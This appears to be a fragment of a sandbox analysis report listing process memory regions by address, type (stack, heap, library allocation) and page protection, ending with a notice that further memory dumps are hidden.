|
C2CADFE000
|
stack
|
page read and write
|
||
|
7FFAACBCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
265FDAC0000
|
heap
|
page read and write
|
||
|
25AF94C6000
|
heap
|
page read and write
|
||
|
265FDA94000
|
heap
|
page read and write
|
||
|
25AF9501000
|
heap
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
217918B0000
|
heap
|
page read and write
|
||
|
21791858000
|
heap
|
page read and write
|
||
|
C2CAC7E000
|
stack
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCCA000
|
trusted library allocation
|
page read and write
|
||
|
26590001000
|
trusted library allocation
|
page read and write
|
||
|
25AF96B5000
|
heap
|
page read and write
|
||
|
D9E18BD000
|
stack
|
page read and write
|
||
|
25AF985A000
|
heap
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
265FBB10000
|
trusted library allocation
|
page read and write
|
||
|
265FBBE5000
|
heap
|
page read and write
|
||
|
25AF9635000
|
heap
|
page read and write
|
||
|
C2CA893000
|
stack
|
page read and write
|
||
|
D9E17B7000
|
stack
|
page read and write
|
||
|
21791950000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE01000
|
trusted library allocation
|
page read and write
|
||
|
D9E193E000
|
stack
|
page read and write
|
||
|
25AF950A000
|
heap
|
page read and write
|
||
|
25AF9529000
|
heap
|
page read and write
|
||
|
C2CAD7E000
|
stack
|
page read and write
|
||
|
2658001B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
21793AE0000
|
trusted library allocation
|
page read and write
|
||
|
265FBBE0000
|
heap
|
page read and write
|
||
|
26580001000
|
trusted library allocation
|
page read and write
|
||
|
21794D7E000
|
trusted library allocation
|
page read and write
|
||
|
25AF94C0000
|
heap
|
page read and write
|
||
|
21791944000
|
heap
|
page read and write
|
||
|
217AB984000
|
heap
|
page read and write
|
||
|
217938D3000
|
trusted library allocation
|
page read and write
|
||
|
FFBDDAA000
|
stack
|
page read and write
|
||
|
265FD850000
|
heap
|
page execute and read and write
|
||
|
25AF9601000
|
heap
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
26580107000
|
trusted library allocation
|
page read and write
|
||
|
26580161000
|
trusted library allocation
|
page read and write
|
There are 394 hidden memdumps, click here to show them.